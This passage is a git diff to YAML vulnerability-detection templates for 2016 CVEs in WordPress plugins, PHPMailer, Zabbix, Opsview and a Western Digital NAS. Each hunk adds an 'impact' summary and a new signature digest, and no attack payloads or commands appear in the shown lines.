     Update to the latest version of the WordPress forget-about-shortcode-buttons plugin (1.1.1) or apply the necessary patches.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100859d2309e5dd2d5ed0c00598865cb87c8747e23c2e722ccebddb4c00b2d50817022100be827f4a75d3bc20f95149f54e2861489fece6fad9376fb8b6f369557dfb06a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d998fcf68f70eb1a02ab204ad6e87866e5ca8a0f41d504d26e130b9d9074a8ee022100b7cc11f7fd5573ac5d93473e635ef2c6bc994cef63574ca3c3347abe7f9f50e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml
index a6788e3efd..3eebe36650 100644
--- a/http/cves/2016/CVE-2016-1000134.yaml
+++ b/http/cves/2016/CVE-2016-1000134.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via playlist.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402204020a1b35f5a3dca449f1a17c92be0ebfc96dc4d0f2c8f2b0bae056f07b91fb802207e9edbc04320994c9dbed77d5b02f0f6ee3f911eb0a9acee0a41bd52d51a97e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202042cf1d42fc45d601b334ddd9be2c4ad81cbad0ae21b7dbe37fb8544563569d022100ae6f9bb206b14f9447da6ab5f14c1d7cb44faac9024450697a65988ae18abe9a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml
index 41d8cb8886..f227aee8d0 100644
--- a/http/cves/2016/CVE-2016-1000135.yaml
+++ b/http/cves/2016/CVE-2016-1000135.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress HDW Video Gallery 1.2 and before contains a cross-site scripting vulnerability via mychannel.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress HDW Video Gallery plugin (>=1.3) which includes a fix for this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203ca753b9fcc01aba855555f22d3f0ee87875774bbdbdce7783fb363d4bce4f3102201210ae6e4f262daf0ce13310afce95669f1a26b06091321f3fac20cc09583045:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202ae7e69715174775754687933be15753322876a7d53fc939fc91dbdf3be3ebf402206787796d6e14595575b64d2d299d4fba4c37323cf878221c599966ab9df54d79:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml
index 2bfcda78a8..dcf54480c2 100644
--- a/http/cves/2016/CVE-2016-1000137.yaml
+++ b/http/cves/2016/CVE-2016-1000137.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022028333bf5c2cca82e775be610851e57c7a58a40e4b351b064e08b49fd6732afb4022018ac991ce7ae978842da66bf3dab278151bce8fcdfeb0a7de3ff56fbf37c34a8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d13872bb9ed9b91e775d32a2561efb705b7f1ece4cca3dceeb14e46e652b1aaa02200a9b001ae5dd3180201319afe2a34597961731411ecf7cc760e62c6c827bb57f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml
index 2fcad56a54..661bceb72a 100644
--- a/http/cves/2016/CVE-2016-1000138.yaml
+++ b/http/cves/2016/CVE-2016-1000138.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c5c472ac2a24310107f7ca14d8ef72a7804eeb484efe1abc014b63dedf311e0902210088d9e09a6ed8af95117f3176df1c071d3d6944c12a89e303222372ff75824169:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022044d03e11c211379984dfe27ce61b07211d7a29b1b973fa042700157a63bca57a022075014e7967f8dac0eb7fd71d58bc39cec5f435e57ada53b02b17f03c571b00fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml
index 616aa80bae..74960b68de 100644
--- a/http/cves/2016/CVE-2016-1000139.yaml
+++ b/http/cves/2016/CVE-2016-1000139.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b4eae642fcdb8a32023d84641c529a9ededa159c1544cd7c47f97d07cac2f64b022100c07ae728e621a3c9815e34e8ed636988825be98370e8412727ce70e3be85d5fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022038c2f775b42393f728de7baef85661a358e82cfb3263505309fc649a5fe396f902210089a598413f6401c8913deae9e3e26e8789c9404133fe77da7144e261b0f51990:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml
index 996eb2b4fd..3cf05a91dd 100644
--- a/http/cves/2016/CVE-2016-1000140.yaml
+++ b/http/cves/2016/CVE-2016-1000140.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.
   remediation: |
     Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022071b7c59cdaf3c3070095682b4b43d40f56f21965061a48228744134596fdcb3e022100b4451244edcbef836ba4132ec86e8e22e2cb589a2f63c0c279e18d07075a6f76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200ce83fde2ff1834fb1016fd6142a629a94645117f68c3a24a6c75211b4ef127802201e05e7620b3183f21b55d47f1657af3364591be7da940f55f6ccc61a6c4350e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml
index e39badc1a8..a7d01fbb9e 100644
--- a/http/cves/2016/CVE-2016-1000141.yaml
+++ b/http/cves/2016/CVE-2016-1000141.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Upgrade to version 2.0 or higher.
   reference:
     - http://www.vapidlabs.com/wp/wp_advisory.php?v=358
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022073cdf398588f8f8ed97d8750a345f5738ff542be67974624baaceead24851b8d022100bde408c18e9ac2a0bfd28b3db8e54f8f9026c00e1bea2729a215b7c88ceaafe3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210094b3fb8569588c41ce9418dbef98a6bf1d6ff444785510b3626e133e1c1d58f7022100f76dfb013079bff68286f9aeed929b4f67d98052767d13ef6e5bf9e7156e64dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml
index 0297d0d5bd..df7400be6b 100644
--- a/http/cves/2016/CVE-2016-1000142.yaml
+++ b/http/cves/2016/CVE-2016-1000142.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft.
   remediation: |
     Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a00463044022100e4807f9595ece7c738aee8017503dea3c891f7669f99304dbed8323eeece2d97021f1a4433c09ea577dd68babbe6e515f34f1d2efca75934520b2e8bcdeb6b77ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ae3f3453570b62f688d9635413dcb03aec3c7a99f1274b0891b341dff7ce4d9d022100f62692b07aeaca96280089866d8a3f70d31ccddbbdebec6d6890faf10f7458c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml
index 48d8b91a24..5bbb52edee 100644
--- a/http/cves/2016/CVE-2016-1000143.yaml
+++ b/http/cves/2016/CVE-2016-1000143.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009b80f81c2daee2c87a798d7425931ae4cd1bcf038c7307458818b7e92846bf8b022100cef0ebedfe1cf9a496e55408fb3e82b950bfca038795d75817711352577c722b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009cfd669a113df17bcb40d2d666622e3bee811d2bf7e666fbf613efae9a57f9a5022100eeda200e3565787dfa6178cc39a8a81daa2c207435ffa482c4acee9adbc434e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml
index 30db053bf4..c69080d170 100644
--- a/http/cves/2016/CVE-2016-1000146.yaml
+++ b/http/cves/2016/CVE-2016-1000146.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100df67aa27d7c4b8bc16af09945fdfa8564c4124b217a1d725e947d8c8ec36f0460221008517b8dad15a5c016afa31ea3ce4d573746edeb4ba4ba81973a87808d91cf7e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ebd9c80bb626d681fb8b404cc79810cc7a961b13fc1922cec330676beb7d0a3c022100e2f37aa92643d7d9c40748233939cf5877d2dc888eae41972c4061dec7945349:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml
index a957bbbe11..82b856ada7 100644
--- a/http/cves/2016/CVE-2016-1000148.yaml
+++ b/http/cves/2016/CVE-2016-1000148.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c22656b9018685866e3895d651f6c495d7a892213e6308bc84acb078b13168420220236afdceb11ee3e5d92d979496774e59c7751f4911464e4b69cb1ad4b2e63624:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e65645af92854af7b274d0fdb6344ca4fa6195d26ac6c3a5ab6c55670bf7cc5202202d8ee62a887d9a8cddebd5451e1b31c32713c634b950cee7e19ae8de652a7844:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml
index 577610523b..7c442a5430 100644
--- a/http/cves/2016/CVE-2016-1000149.yaml
+++ b/http/cves/2016/CVE-2016-1000149.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a004630440220579a36af30d2c0df77b1a87333faa79c55a54da67b5d0da811b9d6b82341f31602206ca9d4effeb21d3ec18f3fc45b4521f85c3858c053e82b2018634e8378bca29b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022027d53e22d832b3880c76d06a0e6af69830072d99cbf8b1035b0421c4a54d5a22022100f8a4566b8ef3f7095c31722208e0f6437fcceb12c90c0b9432678cffa39621e8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml
index d2d909568b..ac10c66468 100644
--- a/http/cves/2016/CVE-2016-1000152.yaml
+++ b/http/cves/2016/CVE-2016-1000152.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100cf0c6816dc7ed072cdcb63497b562c2275e754b4b786907c8885988952f25f9102205f626ac77d8a28e4bbfb11a5e8b32e3124f25f3083a60b2fc1d836a9aebbf931:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202320d71412920e9d5bb1317b2c70d3e0708dbfb6242d91301fd10b31ad22162c02210090da3452e494e75aa9ad342f65882dee43e3d2b2fab580c8eade70c0d9ea42ec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml
index 9380b5cb63..a812814656 100644
--- a/http/cves/2016/CVE-2016-1000153.yaml
+++ b/http/cves/2016/CVE-2016-1000153.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress plugin tidio-gallery v1.1 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Tidio Gallery plugin (1.1 or higher) to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221009d659b42461b6c97deb65c6471b827e86b4f56ded7913cc84c7f9a73dbc8b6d9022053504d1ce21adc001c826b17feb3406c726686a57a36a79fd396f216158d409c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f552e23c4102569d6493360038782082f6a830b6e2b760e8e7c431dcf84bcf65022100c183c991d5ae7782bb06b88f5d25624ac861f6e6a79817528f5c23e8b47ab523:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml
index 2b2ea98f07..5292f839a3 100644
--- a/http/cves/2016/CVE-2016-1000154.yaml
+++ b/http/cves/2016/CVE-2016-1000154.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update WordPress WHIZZ plugin to the latest version (>=1.0.8) which includes a fix for the XSS vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210087db94300ef55efc31126909e5822b83c9e9004de55cce12edadfe176f612b10022030883e40efb02dd28860cea7b72eb83747975b9deed69c17dc05302a1a563e95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c9ecb8d4340a25f3f7d2573227b20d3f7a4e6ef59f3c382d46cc9c53f85730c202206d16f899146ad3747a33306658f7e09d9a5f42f0428834479ca36b8f27cf4050:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml
index b4d1782198..251d9e949a 100644
--- a/http/cves/2016/CVE-2016-10033.yaml
+++ b/http/cves/2016/CVE-2016-10033.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution on the affected WordPress website.
   remediation: |
     Upgrade PHPMailer to version 5.2.18 or higher to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
           - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>'
         internal: true
         part: body
-# digest: 490a0046304402207f3231093276f853a1728d5e91ef132567e99cf538f9fb4a5e9816280588e061022058ba45c9c1c77aafdb81f26cc2377cadfb18e31d678756218cb56ac7ab243edf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022059cdbccba12baad07ccef44d1527a3fff3edf6fbe2c982026487c98aa4541d71022064670d4c347cb92cc7115b5b6135502742f281ac0af059d0ac9090ee800de466:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml
index 54b5e9cece..cdc749070f 100644
--- a/http/cves/2016/CVE-2016-10108.yaml
+++ b/http/cves/2016/CVE-2016-10108.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.
   remediation: |
     Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
   reference:
@@ -42,4 +44,4 @@ http:
           - contains(interactsh_protocol, "dns")
           - status_code == 200
         condition: and
-# digest: 490a0046304402202a9aba9a22b8cea2aff40d319c80f78f3dae06a1d43ae5b48571c59f8d97c5060220694a4f51b21d5fa3ed6f517f38a03da8b4ae36e4efb07ded59d79ec560671633:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100dbaee698e438bb5ea57042639ff8c9cbcfb0f6e84dd6c329190b34561f45855c022029c504dc2b5ec6477451bb68096c7031a634878f22bc09e71a3c02150f620dc8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml
index 059dc5ac68..f336d8c25b 100644
--- a/http/cves/2016/CVE-2016-10134.yaml
+++ b/http/cves/2016/CVE-2016-10134.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the Zabbix application and underlying systems.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of Zabbix to mitigate the SQL Injection vulnerability (CVE-2016-10134).
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203fca6b69808c641d863e945f0c9731775097a3c445c6dc396362e6ddbcbc0fa3022100af3ffe23d77be0d49f6bd61ce78861c4f74054b5b38360ea181111b89d39b1ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f961836dd9c8138c996587b4274a1507a43bb914a8115c9b14ebfd61e82d7bc8022022599dbc6ce051c65a9fed1ff8126734d008bc982058429df84ecae4476e7adb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml
index c58e17e3d2..a247e7ddf1 100644
--- a/http/cves/2016/CVE-2016-10367.yaml
+++ b/http/cves/2016/CVE-2016-10367.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_akoko
   severity: high
   description: Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Upgrade to the latest version of Opsview Monitor Pro to fix the local file inclusion vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a0047304502203e2b83033030f8a6171621b67e3bc2c32723488b73ff2bcd4bf9c74f17dd40c7022100ffa48effdcfa403f16f93f9a3b4bb3707b0234105d6e0c00e5b99d8db4cd1e57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b384f35bea8369c8043e5008d6034d51fb454683d16807f8672e1b9e745a57fb022100b08cef498081b7daaae50164fbf1f9a90fc0606621467fc85d9bfd2deaf6f017:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml
index 8cc368fa6d..ff01790df3 100644
--- a/http/cves/2016/CVE-2016-10368.yaml
+++ b/http/cves/2016/CVE-2016-10368.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.
+  impact: |
+    An attacker can redirect users to malicious websites, leading to phishing attacks or the download of malware.
   remediation: |
     Apply the latest patch or upgrade to a version that is not affected by the vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 302
-# digest: 4b0a00483046022100ecbdf540f103d151acceba5ab1000894864ed6f014d43a32563069f9983cb159022100e5e45c2ae46d16e7ab0d2f9a93e8caf25fcc31a1a8dab6f5425d56b94b80e53f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009776ba3db9cbf2e79ed4dbabfb0662340f4862132b82055252979c9fdff78bcf022020a2a76e3d3f5fc0b14ae0ba49a11bf8b41f66fb870282afcf98ee300a306def:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml
index f12b183fab..4e62d3a64d 100644
--- a/http/cves/2016/CVE-2016-10924.yaml
+++ b/http/cves/2016/CVE-2016-10924.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Wordpress Zedna eBook download prior to version 1.2 was affected by a filedownload.php local file inclusion vulnerability.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to sensitive information disclosure or remote code execution.
   remediation: |
     Update to the latest version of the plugin to fix the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b8556a608b66a20d71905fe4f1f8701cf500bad5d3bcf4f94d62ee8495b4ba4a0221009092e45f03de41e47b2322d5072718e5efc37b7b21ad2fcda4c0f203720b586e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f5e4573ee0a629024d4991c7d74d8584819a3bc1b340c6997776cd28d3116af002201f9e8bd5418f20ba3c159818d714073f0e700281290f1a794d519371336ff08f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml
index 7c27ae6f00..3c203a30c5 100644
--- a/http/cves/2016/CVE-2016-10940.yaml
+++ b/http/cves/2016/CVE-2016-10940.yaml
@@ -5,6 +5,8 @@ info:
   author: cckuailong,daffainfo
   severity: high
   description: zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Update to the latest version of the zm-gallery plugin or apply the patch provided by the vendor.
   reference:
@@ -53,4 +55,4 @@ http:
